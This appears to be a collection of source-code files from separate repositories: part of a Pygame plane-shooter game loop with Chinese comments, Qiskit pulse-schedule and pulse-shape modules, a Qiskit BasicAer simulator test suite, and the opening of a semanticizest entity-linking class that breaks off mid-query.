life_supply.reset() if main_value % 3 == 2: bullet_supply.reset() elif event.type == double_bullet_timer: is_double_bullet = False pygame.time.set_timer(double_bullet_timer, 0) elif event.type == invincible_timer: me.invincible = False pygame.time.set_timer(invincible_timer, 0) # 等级难度提升 # 二级难度 if level == 1 and score > 30000: level = 2 level2_sound.play() # 增加小型敌机3 中型2, 大型1 add_small_enemy(small_enemy, enemys, 3) add_mid_enemy(mid_enemy, enemys, 2) add_big_enemy(big_enemy, enemys, 1) # 增加小型敌机速度 inc_speed(small_enemy, 1) # 三级难度 elif level == 2 and score > 100000: level = 3 level3_sound.play() # 增加小型敌机4, 中型3, 大型2 add_small_enemy(small_enemy, enemys, 4) add_mid_enemy(mid_enemy, enemys, 3) add_big_enemy(big_enemy, enemys, 2) # 增加小型, 中型敌机速度 inc_speed(small_enemy, 1) # 四级难度 elif level == 3 and score > 300000: level = 4 level4_sound.play() pygame.mixer.music.pause() level4_backmusic.play(-1) pygame.time.set_timer(supply_timer, 30 * 1000) # 增加小型敌机6, 中型5, 大型3 add_small_enemy(small_enemy, enemys, 6) add_mid_enemy(mid_enemy, enemys, 5) add_big_enemy(big_enemy, enemys, 3) # 增加小型, 中型敌机速度 inc_speed(small_enemy, 1) # 五级难度 elif level == 4 and score > 600000: level = 5 level5_sound.play() # 增加小型敌机8, 中型7, 大型4 add_small_enemy(small_enemy, enemys, 8) add_mid_enemy(mid_enemy, enemys, 7) add_big_enemy(big_enemy, enemys, 4) # 增加小型, 中型敌机速度 inc_speed(small_enemy, 2) # 六级难度 elif level == 5 and score > 1000000: level = 6 level6_sound.play() level4_backmusic.stop() level6_backmusic.play(-1) # 增加小型敌机10, 中型9, 大型6 add_small_enemy(small_enemy, enemys, 10) add_mid_enemy(mid_enemy, enemys, 9) add_big_enemy(big_enemy, enemys, 6) # 增加小型, 中型敌机速度 inc_speed(small_enemy, 2) inc_speed(mid_enemy, 1) # 绘制游戏背景 screen.blit(people_pause_image, (0, 250)) screen.blit(font_image, (0, 550)) if life_num and not pause: # 检测用户键盘操作 key_button = pygame.key.get_pressed() if key_button[K_w] or key_button[K_UP]: me.moveup() if key_button[K_s] or key_button[K_DOWN]: me.movedown() if key_button[K_a] or key_button[K_LEFT]: me.moveleft() if key_button[K_d] or key_button[K_RIGHT]: me.moveright() screen.blit(background, (0, 0)) # 绘制核弹并检测是否获得 if bomb_supply.active: bomb_supply.move() screen.blit(bomb_supply.image, bomb_supply.rect) # 检测是否获得 if pygame.sprite.collide_mask(bomb_supply, me): get_bomb.play() if boom_num < 3: boom_num += 1 if boom_num >= 3: too_much_bomb.play() bomb_supply.active = False # 绘制生命并检测是否获得 if life_supply.active: life_supply.move() screen.blit(life_supply.image, life_supply.rect) # 检测是否获得 if pygame.sprite.collide_mask(life_supply, me): get_bomb.play() if life_num < 3: life_num += 1 if life_num >= 3: too_much_life.play() life_supply.active = False # 绘制超级子弹 if bullet_supply.active: bullet_supply.move() screen.blit(bullet_supply.image, bullet_supply.rect) # 检测是否获得 if pygame.sprite.collide_mask(bullet_supply, me): get_bullet.play() # 发射超级子弹 is_double_bullet = True pygame.time.set_timer(double_bullet_timer, 20 * 1000) bullet_supply.active = False # 发射子弹 delay % 10 就是限制子弹为10帧/s if not (delay % 10): launch_bullet.play() if is_double_bullet: bullets = bullet2 bullets[bullet2_index].reset((me.rect.centerx-55, me.rect.centery)) bullets[bullet2_index+1].reset((me.rect.centerx+20, me.rect.centery)) bullet2_index = (bullet2_index + 2) % bullet2_nums else: bullets = bullet1 bullets[bullet1_index].reset((me.rect.centerx-2.5, me.rect.centery)) bullet1_index = (bullet1_index + 1) % bullet1_nums # 检测子弹击中敌人 for b in bullets: if b.active: b.move() screen.blit(b.image, b.rect) enemy_hit = pygame.sprite.spritecollide(b, enemys, False, pygame.sprite.collide_mask) if enemy_hit: b.active = False for e in enemy_hit: if e in big_enemy or e in mid_enemy: e.hit = True e.energy -= 1 if e.energy == 0: e.active = False else: e.active = False # 绘制大型敌机 for each in big_enemy: if each.active: # 初速度 each.move() if each.hit: screen.blit(each.image_hit, each.rect) each.hit = False else: screen.blit(each.image, each.rect) # 绘制大型敌机血量底槽 pygame.draw.line(screen, BLACK, (each.rect.left, each.rect.top - 5), (each.rect.right, each.rect.top - 5), 4) # 绘制大型飞机击中时血量 # 计算当时的血量 energy_count = each.energy / enemyplan.BigPlan.energy # 如果血量大于百分之二十绘制绿色 否则绘制红色 if energy_count > 0.2: energy_color = GREEN else: energy_color = RED # 绘制敌机被击中的当时血量 pygame.draw.line(screen, energy_color, (each.rect.left, each.rect.top - 5), (each.rect.left + each.rect.width * energy_count, each.rect.top - 5), 4) # 添加出场音效 if each.rect.bottom == -100: appear_bigplan.play() else: # 飞机毁灭播放 if not (delay % 3): if big_destory_index == 0: big_sound.play() screen.blit(each.destory_images[big_destory_index], each.rect) big_destory_index = (big_destory_index + 1) % 9 if big_destory_index == 0: score += 13140 each.reset() # 绘制中型敌机 for each in mid_enemy: if each.active: # 初速度 each.move() if each.hit: screen.blit(each.image_hit, each.rect) each.hit = False else: screen.blit(each.image, each.rect) # 绘制中型敌机血量底槽 pygame.draw.line(screen, BLACK, (each.rect.left, each.rect.top - 5), (each.rect.right, each.rect.top - 5), 3) # 绘制中型飞机击中时血量 # 计算当时的血量 energy_count = each.energy / enemyplan.MidPlan.energy # 如果血量大于百分之二十绘制绿色 否则绘制红色 if energy_count > 0.2: energy_color = GREEN else: energy_color = RED # 绘制敌机被击中的当时血量 pygame.draw.line(screen, energy_color, (each.rect.left, each.rect.top - 5), (each.rect.left + each.rect.width * energy_count, each.rect.top - 5), 3) else: if not (delay % 3): # 毁灭图像播放 if mid_destory_index == 0: mid_sound.play() screen.blit(each.destory_images[mid_destory_index], each.rect) mid_destory_index = (mid_destory_index + 1) % 6 if mid_destory_index == 0: score += 5200 each.reset() # 绘制小型敌机 for each in small_enemy: if each.active: each.move() screen.blit(each.image, each.rect) else: if not (delay % 3): # 毁灭播放图像音频 if small_destory_index == 0: small_sound.play() screen.blit(each.destory_images[small_destory_index], each.rect) small_destory_index = (small_destory_index + 1) % 4 if small_destory_index == 0: score += 520 each.reset() # 我方飞机碰撞检测 enemys_down = pygame.sprite.spritecollide(me, enemys, False, pygame.sprite.collide_mask) if enemys_down and not me.invincible: me.active = False for e in enemys_down: e.active = False # 绘制我方飞机 if me.active: if switch_image: screen.blit(me.image, me.rect) else: screen.blit(me.image1, me.rect) else: # 毁灭图像播放 if me_destory_index == 0: die_Myplan.play() screen.blit(me.destory_image[me_destory_index], me.rect) me_destory_index = (me_destory_index + 1) % 4 if me_destory_index == 0: # 生命值-1 life_num -= 1 # 复活 me.reset() pygame.time.set_timer(invincible_timer, 3 * 1000) for i in range(life_num): if not (delay % 1): screen.blit(reset_font_image, me.rect) # 绘制炸弹UI boom_text = boom_font.render(' x %d ' % boom_num, True, WHITE) text_rect = boom_text.get_rect() screen.blit(boom_image, (5, 150)) screen.blit(boom_text, (75, 150)) # 绘制生命UI life_text = life_font.render(' x %d' % life_num, True, WHITE) text_rect = life_text.get_rect() screen.blit(life_image, (5, 65)) screen.blit(life_text, (75, 65)) # 将分数通过字符串添加到surface对象 score_text = score_font.render('分数: %s' % str(score), True, WHITE) # 绘制分数 screen.blit(score_text, (10, 20)) elif life_num == 0: screen.blit(background, (0, 0)) # 游戏结束背景音乐关闭 pygame.mixer.music.stop() # 停止全部音效 pygame.mixer.stop() # 停止发放补给箱 pygame.time.set_timer(supply_timer, 0) # 用于存写历史记录 if not recorded: recorded = True # 读取历史最高得分 with open("游戏历史记录.txt", "r") as f: record_score = int(f.read()) # 判断当前分数是否高于游戏历史最高记录 if score > record_score: with open("游戏历史记录.txt", "w") as f: f.write(str(score)) # 绘制结束画面 record_score_text = score_font.render("最高分 : %d" \ % record_score, True, (255, 255, 255)) screen.blit(record_score_text, (0, 0)) gameover_text1 = gameover_font.render("最终得分", True, (255, 255, 255)) gameover_text1_rect = gameover_text1.get_rect() gameover_text1_rect.left, gameover_text1_rect.top = \ (width - gameover_text1_rect.width) // 2, height // 3 screen.blit(gameover_text1, gameover_text1_rect) gameover_text2 = gameover_font.render(str(score), True, (255, 255, 255)) gameover_text2_rect = gameover_text2.get_rect() gameover_text2_rect.left, gameover_text2_rect.top = \ (width - gameover_text2_rect.width) // 2, \ gameover_text1_rect.bottom + 10 screen.blit(gameover_text2, (190, 355)) again_rect.left, again_rect.top = \ (width - again_rect.width) // 2, \ gameover_text2_rect.bottom + 50 screen.blit(again_image, again_rect) gameover_rect.left, gameover_rect.top = \ (width - again_rect.width) // 2, \ again_rect.bottom + 10 screen.blit(gameover_image, gameover_rect) # 绘制GAMEOVER字体 screen.blit(end_image, (100, 110)) # 绘制LOGO # LOGO screen.blit(logo_image, (10, 810)) # Font screen.blit(logo_font, (110, 802)) # 检测用户的鼠标操作 # 如果用户按下鼠标左键 if pygame.mouse.get_pressed()[0]: # 获取鼠标坐标 pos = pygame.mouse.get_pos() # 如果用户点击“重新开始” if again_rect.left < pos[0] < again_rect.right and \ again_rect.top < pos[1] < again_rect.bottom: # 调用main函数,重新开始游戏 main() # 如果用户点击“结束游戏” elif gameover_rect.left < pos[0] < gameover_rect.right and \ gameover_rect.top < pos[1] < gameover_rect.bottom: # 退出游戏 pygame.quit() sys.exit() # 绘制暂停按钮 screen.blit(paused_image, paused_rect) # 绘制声音按钮 screen.blit(voice_image, voice_rect) if not(delay % 1): switch_image = not switch_image delay -= 1 if not delay: delay = 100 # 游戏图像翻转 pygame.display.flip() # 帧率限制 clock.tick(60) ``` #### File: 90327/Pygame/supply.py ```python import pygame from random import * class BulletSupply(pygame.sprite.Sprite): def __init__(self, size): pygame.sprite.Sprite.__init__(self) self.image = pygame.image.load('image\\boom\\bullet_fly.png') self.width, self.height = size[0], size[1] self.rect = self.image.get_rect() self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 self.speed = 4 self.active = False self.mask = pygame.mask.from_surface(self.image) def move(self): if self.rect.top < self.height: self.rect.top += self.speed else: self.active = False def reset(self): self.active = True self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 class BombSupply(pygame.sprite.Sprite): def __init__(self, size): pygame.sprite.Sprite.__init__(self) self.image = pygame.image.load('image\\boom\\bomb_fly.png') self.rect = self.image.get_rect() self.width, self.height = size[0], size[1] self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 self.speed = 4 self.active = False self.mask = pygame.mask.from_surface(self.image) def move(self): if self.rect.top < self.height: self.rect.top += self.speed else: self.active = False def reset(self): self.active = True self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 class LifeSupply(pygame.sprite.Sprite): def __init__(self, size): pygame.sprite.Sprite.__init__(self) self.image = pygame.image.load('image\\boom\\fly_life.png') self.width, self.height = size[0], size[1] self.rect = self.image.get_rect() self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 self.speed = 4 self.active = False self.mask = pygame.mask.from_surface(self.image) def move(self): if self.rect.top < self.height: self.rect.top += self.speed else: self.active = False def reset(self): self.active = True self.rect.left, self.rect.bottom = randint(0, self.width - self.rect.width), 100 ```
{ "source": "904194705/Qiskit-RIKEN-project-", "score": 3 }
#### File: qiskit/pulse/cmd_def.py ```python from typing import List, Tuple, Iterable, Union, Dict, Optional from qiskit.qobj import PulseQobjInstruction from qiskit.qobj.converters import QobjToInstructionConverter from .commands import SamplePulse from .exceptions import PulseError from .schedule import Schedule, ParameterizedSchedule # pylint: disable=missing-return-doc def _to_qubit_tuple(qubit_tuple: Union[int, Iterable[int]]) -> Tuple[int]: """Convert argument to tuple. Args: qubit_tuple: Qubits to enforce as tuple. Raises: PulseError: If qubits are not integers """ try: qubit_tuple = tuple(qubit_tuple) except TypeError: qubit_tuple = (qubit_tuple,) if not all(isinstance(i, int) for i in qubit_tuple): raise PulseError("All qubits must be integers.") return qubit_tuple class CmdDef: """Command definition class. Relates `Gate`s to `Schedule`s.""" def __init__(self, schedules: Optional[Dict] = None): """Create command definition from backend. Args: schedules: Keys are tuples of (cmd_name, *qubits) and values are `Schedule` or `ParameterizedSchedule` """ self._cmd_dict = {} if schedules: for key, schedule in schedules.items(): self.add(key[0], key[1:], schedule) @classmethod def from_defaults(cls, flat_cmd_def: List[PulseQobjInstruction], pulse_library: Dict[str, SamplePulse]) -> 'CmdDef': """Create command definition from backend defaults output. Args: flat_cmd_def: Command definition list returned by backend pulse_library: Dictionary of `SamplePulse`s """ converter = QobjToInstructionConverter(pulse_library, buffer=0) cmd_def = cls() for cmd in flat_cmd_def: qubits = cmd.qubits name = cmd.name instructions = [] for instr in cmd.sequence: instructions.append(converter(instr)) cmd_def.add(name, qubits, ParameterizedSchedule(*instructions, name=name)) return cmd_def def add(self, cmd_name: str, qubits: Union[int, Iterable[int]], schedule: Union[ParameterizedSchedule, Schedule]): """Add a command to the `CommandDefinition` Args: cmd_name: Name of the command qubits: Qubits command applies to schedule: Schedule to be added """ qubits = _to_qubit_tuple(qubits) cmd_dict = self._cmd_dict.setdefault(cmd_name, {}) if isinstance(schedule, Schedule): schedule = ParameterizedSchedule(schedule, name=schedule.name) cmd_dict[qubits] = schedule def has(self, cmd_name: str, qubits: Union[int, Iterable[int]]) -> bool: """Has command of name with qubits. Args: cmd_name: Name of the command qubits: Ordered list of qubits command applies to """ qubits = _to_qubit_tuple(qubits) if cmd_name in self._cmd_dict: if qubits in self._cmd_dict[cmd_name]: return True return False def get(self, cmd_name: str, qubits: Union[int, Iterable[int]], *params: List[Union[int, float, complex]], **kwparams: Dict[str, Union[int, float, complex]]) -> Schedule: """Get command from command definition. Args: cmd_name: Name of the command qubits: Ordered list of qubits command applies to *params: Command parameters to be used to generate schedule **kwparams: Keyworded command parameters to be used to generate schedule Raises: PulseError: If command for qubits is not available """ qubits = _to_qubit_tuple(qubits) if self.has(cmd_name, qubits): schedule = self._cmd_dict[cmd_name][qubits] if isinstance(schedule, ParameterizedSchedule): return schedule.bind_parameters(*params, **kwparams) return schedule.flatten() else: raise PulseError('Command {0} for qubits {1} is not present ' 'in CmdDef'.format(cmd_name, qubits)) def get_parameters(self, cmd_name: str, qubits: Union[int, Iterable[int]]) -> Tuple[str]: """Get command parameters from command definition. Args: cmd_name: Name of the command qubits: Ordered list of qubits command applies to Raises: PulseError: If command for qubits is not available """ qubits = _to_qubit_tuple(qubits) if self.has(cmd_name, qubits): schedule = self._cmd_dict[cmd_name][qubits] return schedule.parameters else: raise PulseError('Command {0} for qubits {1} is not present ' 'in CmdDef'.format(cmd_name, qubits)) def pop(self, cmd_name: str, qubits: Union[int, Iterable[int]], *params: List[Union[int, float, complex]], **kwparams: Dict[str, Union[int, float, complex]]) -> Schedule: """Pop command from command definition. Args: cmd_name: Name of the command qubits: Ordered list of qubits command applies to *params: Command parameters to be used to generate schedule **kwparams: Keyworded command parameters to be used to generate schedule Raises: PulseError: If command for qubits is not available """ qubits = _to_qubit_tuple(qubits) if self.has(cmd_name, qubits): cmd_dict = self._cmd_dict[cmd_name] schedule = cmd_dict.pop(qubits) if isinstance(schedule, ParameterizedSchedule): return schedule.bind_parameters(*params, **kwparams) return schedule else: raise PulseError('Command {0} for qubits {1} is not present ' 'in CmdDef'.format(cmd_name, qubits)) def cmds(self) -> List[str]: """Return all command names available in CmdDef.""" return list(self._cmd_dict.keys()) def cmd_qubits(self, cmd_name: str) -> List[Tuple[int]]: """Get all qubit orderings this command exists for.""" if cmd_name in self._cmd_dict: return list(sorted(self._cmd_dict[cmd_name].keys())) return [] def __repr__(self): return repr(self._cmd_dict) ``` #### File: pulse/pulse_lib/discrete.py ```python from typing import Optional from qiskit.pulse.commands import SamplePulse from qiskit.pulse.pulse_lib import continuous from qiskit.pulse import samplers _sampled_constant_pulse = samplers.left(continuous.constant) def constant(duration: int, amp: complex, name: Optional[str] = None) -> SamplePulse: """Generates constant-sampled `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Complex pulse amplitude. name: Name of pulse. """ return _sampled_constant_pulse(duration, amp, name=name) _sampled_zero_pulse = samplers.left(continuous.zero) def zero(duration: int, name: Optional[str] = None) -> SamplePulse: """Generates zero-sampled `SamplePulse`. Args: duration: Duration of pulse. Must be greater than zero. name: Name of pulse. """ return _sampled_zero_pulse(duration, name=name) _sampled_square_pulse = samplers.left(continuous.square) def square(duration: int, amp: complex, period: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates square wave `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. Wave range is [-amp, amp]. period: Pulse period, units of dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if period is None: period = duration return _sampled_square_pulse(duration, amp, period, phase=phase, name=name) _sampled_sawtooth_pulse = samplers.left(continuous.sawtooth) def sawtooth(duration: int, amp: complex, period: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates sawtooth wave `SamplePulse`. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. Wave range is [-amp, amp]. period: Pulse period, units of dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if period is None: period = duration return _sampled_sawtooth_pulse(duration, amp, period, phase=phase, name=name) _sampled_triangle_pulse = samplers.left(continuous.triangle) def triangle(duration: int, amp: complex, period: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates triangle wave `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. Wave range is [-amp, amp]. period: Pulse period, units of dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if period is None: period = duration return _sampled_triangle_pulse(duration, amp, period, phase=phase, name=name) _sampled_cos_pulse = samplers.left(continuous.cos) def cos(duration: int, amp: complex, freq: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates cosine wave `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. freq: Pulse frequency, units of 1/dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if freq is None: freq = 1/duration return _sampled_cos_pulse(duration, amp, freq, phase=phase, name=name) _sampled_sin_pulse = samplers.left(continuous.sin) def sin(duration: int, amp: complex, freq: float = None, phase: float = 0, name: Optional[str] = None) -> SamplePulse: """Generates sine wave `SamplePulse`. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. freq: Pulse frequency, units of 1/dt. If `None` defaults to single cycle. phase: Pulse phase. name: Name of pulse. """ if freq is None: freq = 1/duration return _sampled_sin_pulse(duration, amp, freq, phase=phase, name=name) _sampled_gaussian_pulse = samplers.left(continuous.gaussian) def gaussian(duration: int, amp: complex, sigma: float, name: Optional[str] = None) -> SamplePulse: r"""Generates unnormalized gaussian `SamplePulse`. Centered at `duration/2` and zeroed at `t=-1` to prevent large initial discontinuity. Applies `left` sampling strategy to generate discrete pulse from continuous function. Integrated area under curve is $\Omega_g(amp, sigma) = amp \times np.sqrt(2\pi \sigma^2)$ Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude at `duration/2`. sigma: Width (standard deviation) of pulse. name: Name of pulse. """ center = duration/2 zeroed_width = duration + 2 return _sampled_gaussian_pulse(duration, amp, center, sigma, zeroed_width=zeroed_width, rescale_amp=True, name=name) _sampled_gaussian_deriv_pulse = samplers.left(continuous.gaussian_deriv) def gaussian_deriv(duration: int, amp: complex, sigma: float, name: Optional[str] = None) -> SamplePulse: r"""Generates unnormalized gaussian derivative `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude at `center`. sigma: Width (standard deviation) of pulse. name: Name of pulse. """ center = duration/2 return _sampled_gaussian_deriv_pulse(duration, amp, center, sigma, name=name) _sampled_sech_pulse = samplers.left(continuous.sech) def sech(duration: int, amp: complex, sigma: float, name: str = None) -> SamplePulse: r"""Generates unnormalized sech `SamplePulse`. Centered at `duration/2` and zeroed at `t=-1` to prevent large initial discontinuity. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude at `duration/2`. sigma: Width (standard deviation) of pulse. name: Name of pulse. """ center = duration/2 return _sampled_sech_pulse(duration, amp, center, sigma, name=name) _sampled_sech_deriv_pulse = samplers.left(continuous.sech_deriv) def sech_deriv(duration: int, amp: complex, sigma: float, name: str = None) -> SamplePulse: r"""Generates unnormalized sech derivative `SamplePulse`. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude at `center`. sigma: Width (standard deviation) of pulse. name: Name of pulse. """ center = duration/2 return _sampled_sech_deriv_pulse(duration, amp, center, sigma, name=name) _sampled_gaussian_square_pulse = samplers.left(continuous.gaussian_square) def gaussian_square(duration: int, amp: complex, sigma: float, risefall: int, name: Optional[str] = None) -> SamplePulse: """Generates gaussian square `SamplePulse`. Centered at `duration/2` and zeroed at `t=-1` and `t=duration+1` to prevent large initial/final discontinuities. Applies `left` sampling strategy to generate discrete pulse from continuous function. Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude. sigma: Width (standard deviation) of gaussian rise/fall portion of the pulse. risefall: Number of samples over which pulse rise and fall happen. Width of square portion of pulse will be `duration-2*risefall`. name: Name of pulse. """ center = duration/2 width = duration-2*risefall zeroed_width = duration + 2 return _sampled_gaussian_square_pulse(duration, amp, center, width, sigma, zeroed_width=zeroed_width, name=name) _sampled_drag_pulse = samplers.left(continuous.drag) def drag(duration: int, amp: complex, sigma: float, beta: float, name: Optional[str] = None) -> SamplePulse: r"""Generates Y-only correction DRAG `SamplePulse` for standard nonlinear oscillator (SNO) [1]. Centered at `duration/2` and zeroed at `t=-1` to prevent large initial discontinuity. Applies `left` sampling strategy to generate discrete pulse from continuous function. [1] <NAME>., <NAME>., <NAME>. & <NAME>. Analytic control methods for high-fidelity unitary operations in a weakly nonlinear oscillator. Phys. Rev. A 83, 012308 (2011). Args: duration: Duration of pulse. Must be greater than zero. amp: Pulse amplitude at `center`. sigma: Width (standard deviation) of pulse. beta: Y correction amplitude. For the SNO this is $\beta=-\frac{\lambda_1^2}{4\Delta_2}$. Where $\lambds_1$ is the relative coupling strength between the first excited and second excited states and $\Delta_2$ is the detuning between the respective excited states. name: Name of pulse. """ center = duration/2 zeroed_width = duration + 2 return _sampled_drag_pulse(duration, amp, center, sigma, beta, zeroed_width=zeroed_width, rescale_amp=True, name=name) ``` #### File: python/basicaer/test_qasm_simulator.py ```python import unittest import numpy as np from qiskit import execute from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister from qiskit.compiler import transpile, assemble from qiskit.providers.basicaer import QasmSimulatorPy from qiskit.test import Path from qiskit.test import providers class TestBasicAerQasmSimulator(providers.BackendTestCase): """Test the Basic qasm_simulator.""" backend_cls = QasmSimulatorPy def setUp(self): super(TestBasicAerQasmSimulator, self).setUp() self.seed = 88 qasm_filename = self._get_resource_path('example.qasm', Path.QASMS) transpiled_circuit = QuantumCircuit.from_qasm_file(qasm_filename) transpiled_circuit.name = 'test' transpiled_circuit = transpile(transpiled_circuit, backend=self.backend) self.qobj = assemble(transpiled_circuit, shots=1000) def test_qasm_simulator_single_shot(self): """Test single shot run.""" shots = 1 self.qobj.config.shots = shots result = self.backend.run(self.qobj).result() self.assertEqual(result.success, True) def test_qasm_simulator_measure_sampler(self): """Test measure sampler if qubits measured more than once.""" shots = 100 qr = QuantumRegister(2, 'qr') cr = ClassicalRegister(4, 'cr') circuit = QuantumCircuit(qr, cr) circuit.x(qr[1]) circuit.measure(qr[0], cr[0]) circuit.measure(qr[1], cr[1]) circuit.measure(qr[1], cr[2]) circuit.measure(qr[0], cr[3]) target = {'0110': shots} job = execute( circuit, backend=self.backend, shots=shots, seed_simulator=self.seed) result = job.result() counts = result.get_counts(0) self.assertEqual(counts, target) def test_qasm_simulator(self): """Test data counts output for single circuit run against reference.""" result = self.backend.run(self.qobj).result() shots = 1024 threshold = 0.04 * shots counts = result.get_counts('test') target = {'100 100': shots / 8, '011 011': shots / 8, '101 101': shots / 8, '111 111': shots / 8, '000 000': shots / 8, '010 010': shots / 8, '110 110': shots / 8, '001 001': shots / 8} self.assertDictAlmostEqual(counts, target, threshold) def test_if_statement(self): """Test if statements.""" shots = 100 qr = QuantumRegister(3, 'qr') cr = ClassicalRegister(3, 'cr') circuit_if_true = QuantumCircuit(qr, cr) circuit_if_true.x(qr[0]) circuit_if_true.x(qr[1]) circuit_if_true.measure(qr[0], cr[0]) circuit_if_true.measure(qr[1], cr[1]) circuit_if_true.x(qr[2]).c_if(cr, 0x3) circuit_if_true.measure(qr[0], cr[0]) circuit_if_true.measure(qr[1], cr[1]) circuit_if_true.measure(qr[2], cr[2]) circuit_if_false = QuantumCircuit(qr, cr) circuit_if_false.x(qr[0]) circuit_if_false.measure(qr[0], cr[0]) circuit_if_false.measure(qr[1], cr[1]) circuit_if_false.x(qr[2]).c_if(cr, 0x3) circuit_if_false.measure(qr[0], cr[0]) circuit_if_false.measure(qr[1], cr[1]) circuit_if_false.measure(qr[2], cr[2]) job = execute([circuit_if_true, circuit_if_false], backend=self.backend, shots=shots, seed_simulator=self.seed) result = job.result() counts_if_true = result.get_counts(circuit_if_true) counts_if_false = result.get_counts(circuit_if_false) self.assertEqual(counts_if_true, {'111': 100}) self.assertEqual(counts_if_false, {'001': 100}) def test_teleport(self): """Test teleportation as in tutorials""" self.log.info('test_teleport') pi = np.pi shots = 2000 qr = QuantumRegister(3, 'qr') cr0 = ClassicalRegister(1, 'cr0') cr1 = ClassicalRegister(1, 'cr1') cr2 = ClassicalRegister(1, 'cr2') circuit = QuantumCircuit(qr, cr0, cr1, cr2, name='teleport') circuit.h(qr[1]) circuit.cx(qr[1], qr[2]) circuit.ry(pi/4, qr[0]) circuit.cx(qr[0], qr[1]) circuit.h(qr[0]) circuit.barrier(qr) circuit.measure(qr[0], cr0[0]) circuit.measure(qr[1], cr1[0]) circuit.z(qr[2]).c_if(cr0, 1) circuit.x(qr[2]).c_if(cr1, 1) circuit.measure(qr[2], cr2[0]) job = execute(circuit, backend=self.backend, shots=shots, seed_simulator=self.seed) results = job.result() data = results.get_counts('teleport') alice = { '00': data['0 0 0'] + data['1 0 0'], '01': data['0 1 0'] + data['1 1 0'], '10': data['0 0 1'] + data['1 0 1'], '11': data['0 1 1'] + data['1 1 1'] } bob = { '0': data['0 0 0'] + data['0 1 0'] + data['0 0 1'] + data['0 1 1'], '1': data['1 0 0'] + data['1 1 0'] + data['1 0 1'] + data['1 1 1'] } self.log.info('test_teleport: circuit:') self.log.info(circuit.qasm()) self.log.info('test_teleport: data %s', data) self.log.info('test_teleport: alice %s', alice) self.log.info('test_teleport: bob %s', bob) alice_ratio = 1/np.tan(pi/8)**2 bob_ratio = bob['0']/float(bob['1']) error = abs(alice_ratio - bob_ratio) / alice_ratio self.log.info('test_teleport: relative error = %s', error) self.assertLess(error, 0.05) def test_memory(self): """Test memory.""" qr = QuantumRegister(4, 'qr') cr0 = ClassicalRegister(2, 'cr0') cr1 = ClassicalRegister(2, 'cr1') circ = QuantumCircuit(qr, cr0, cr1) circ.h(qr[0]) circ.cx(qr[0], qr[1]) circ.x(qr[3]) circ.measure(qr[0], cr0[0]) circ.measure(qr[1], cr0[1]) circ.measure(qr[2], cr1[0]) circ.measure(qr[3], cr1[1]) shots = 50 job = execute(circ, backend=self.backend, shots=shots, memory=True) result = job.result() memory = result.get_memory() self.assertEqual(len(memory), shots) for mem in memory: self.assertIn(mem, ['10 00', '10 11']) def test_unitary(self): """Test unitary gate instruction""" max_qubits = 4 x_mat = np.array([[0, 1], [1, 0]]) # Test 1 to max_qubits for random n-qubit unitary gate for i in range(max_qubits): num_qubits = i + 1 # Apply X gate to all qubits multi_x = x_mat for _ in range(i): multi_x = np.kron(multi_x, x_mat) # Target counts shots = 100 target_counts = {num_qubits * '1': shots} # Test circuit qr = QuantumRegister(num_qubits, 'qr') cr = ClassicalRegister(num_qubits, 'cr') circuit = QuantumCircuit(qr, cr) circuit.unitary(multi_x, qr) circuit.measure(qr, cr) job = execute(circuit, self.backend, shots=shots) result = job.result() counts = result.get_counts(0) self.assertEqual(counts, target_counts) if __name__ == '__main__': unittest.main() ```
{ "source": "904labs/semanticizest", "score": 3 }
#### File: semanticizest/semanticizest/_semanticizer.py ```python from collections import defaultdict import sqlite3 from os.path import join, dirname, abspath import six from semanticizest._util import ngrams_with_pos, tosequence from semanticizest.parse_wikidump import parse_dump class Semanticizer(object): """Entity linker. This is the main class for using Semanticizest. It's a handle on a statistical model that lives on disk. Parameters ---------- fname : string Filename of the stored model from which to load the Wikipedia statistics. Loading is lazy; the underlying file should not be modified while any Semanticizer is using it. """ def __init__(self, fname): """Create a semanticizer from a stored model.""" commonness = defaultdict(list) self.db = sqlite3.connect(fname) self._cur = self.db.cursor() for target, anchor, count in self._get_senses_counts(): commonness[anchor].append((target, count)) for anchor, targets in six.iteritems(commonness): # targets.sort(key=operator.itemgetter(1), reverse=True) # Turn counts into probabilities. # XXX should we preserve the counts as well? total = float(sum(count for _, count in targets)) commonness[anchor] = [(t, count / total) for t, count in targets] self.commonness = commonness self.N = self._get_ngram_max_length() def _get_ngram_max_length(self): self._cur.execute("select value " "from parameters " "where key = 'N';") N = self._cur.fetchone()[0] if N == 'None': N = None else: N = int(N) return N def _get_senses_counts(self): """Return all senses and their counts.""" return self._cur.execute('select target, ngram as anchor, count ' 'from linkstats, ngrams ' 'where 